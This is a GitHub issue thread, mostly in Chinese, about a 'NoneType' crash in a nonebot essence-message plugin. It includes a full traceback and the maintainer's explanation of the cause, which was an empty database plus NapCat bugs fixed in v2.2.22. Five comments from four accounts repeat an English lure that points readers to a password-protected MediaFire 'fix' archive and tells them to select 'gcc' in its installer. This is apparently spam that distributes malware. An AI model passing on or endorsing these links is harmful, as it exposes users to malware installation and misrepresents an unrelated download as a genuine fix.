### ISSUE TITLE
使用时报错：TypeError: 'NoneType' object is not subscriptable

### ISSUE THREAD

**Issue by Pigeon0v0** [BEISNWKZNAN/nonebot-plugin-essence-message#6]
Alconna 版本为 0.51.4

<details>
<summary>Event & Matcher</summary>
08-28 15:27:09 [SUCCESS] nonebot | OneBot V11 [Removed] | [message.group.normal]: Message [Removed] from [Removed]@[群:[Removed]] 'essence random'
08-28 15:27:09 [INFO] nonebot | Event will be handled by AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=33)
08-28 15:27:09 [INFO] nonebot | AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=33) running complete
08-28 15:27:09 [INFO] nonebot | Event will be handled by AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=96)
08-28 15:27:09 [INFO] nonebot | AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=96) running complete
</details>

<details>
<summary>Stacktrace</summary>
08-28 15:27:09 [ERROR] nonebot | Running AlconnaMatcher(type='', module=nonebot_plugin_essence_message, lineno=96) failed.
Traceback (most recent call last):
  File "<string>", line 19, in <module>
  File "D:\QQBotNew\Arona\.venv\lib\site-packages\nonebot\__init__.py", line 335, in run
    get_driver().run(*args, **kwargs)
  File "D:\QQBotNew\Arona\.venv\lib\site-packages\nonebot\drivers\fastapi.py", line 186, in run
    uvicorn.run(
  File "D:\QQBotNew\Arona\.venv\lib\site-packages\uvicorn\main.py", line 577, in run
    server.run()
  File "D:\QQBotNew\Arona\.venv\lib\site-packages\uvicorn\server.py", line 65, in run
    return asyncio.run(self.serve(sockets=sockets))
  File "C:\Users\Server\AppData\Local\Programs\Python\Python310\lib\asyncio\runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "C:\Users\Server\AppData\Local\Programs\Python\Python310\lib\asyncio\base_events.py", line 636, in run_until_complete
    self.run_forever()
  File "C:\Users\Server\AppData\Local\Programs\Python\Python310\lib\asyncio\windows_events.py", line 321, in run_forever
    super().run_forever()
  File "C:\Users\Server\AppData\Local\Programs\Python\Python310\lib\asyncio\base_events.py", line 603, in run_forever
    self._run_once()
  File "C:\Users\Server\AppData\Local\Programs\Python\Python310\lib\asyncio\base_events.py", line 1909, in _run_once
    handle._run()
  File "C:\Users\Server\AppData\Local\Programs\Python\Python310\lib\asyncio\events.py", line 80, in _run
    self._context.run(self._callback, *self._args)
  File "D:\QQBotNew\Arona\.venv\lib\site-packages\nonebot\message.py", line 476, in check_and_run_matcher
    await _run_matcher(
> File "D:\QQBotNew\Arona\.venv\lib\site-packages\nonebot\message.py", line 428, in _run_matcher
    await matcher.run(bot, event, state, stack, dependency_cache)
  File "D:\QQBotNew\Arona\.venv\lib\site-packages\nonebot\internal\matcher\matcher.py", line 850, in run
    await self.simple_run(bot, event, state, stack, dependency_cache)
  File "D:\QQBotNew\Arona\.venv\lib\site-packages\nonebot\internal\matcher\matcher.py", line 825, in simple_run
    await handler(
  File "D:\QQBotNew\Arona\.venv\lib\site-packages\nonebot\dependencies\__init__.py", line 94, in __call__
    return await cast(Callable[..., Awaitable[R]], self.call)(**values)
  File "D:\QQBotNew\Arona\.venv\lib\site-packages\nonebot_plugin_essence_message\__init__.py", line 101, in random_cmd
    if msg[4] == "text":
TypeError: 'NoneType' object is not subscriptable
</details>

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MovFish** [comment]
我猜测是数据库里没有任何一条精华消息导致的
这种情况下插件应该报错从而没有任何响应

**Comment by Pigeon0v0** [comment]
> 我猜测是数据库里没有任何一条精华消息导致的 这种情况下插件应该报错从而没有任何响应

所以是需要有在插件安装以后的精华消息才可以触发是吗...

**Comment by MovFish** [comment]
可以使用fetchall获取以前的精华消息，不过在NapCat还有些问题
参见[#4](https://github.com/BEISNWKZNAN/nonebot-plugin-essence-message/issues/4)

**Comment by Pigeon0v0** [comment]
我还恰好用的 NapCat... 等修.jpg

是否可以在列表为空时自动尝试 Fetch 一下？

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MovFish** [comment]
1 .使用V2.2.22以上的NapCat可以正常运行了
2. 在不通知使用者的情况我认为还是不要，不过我加了个提示
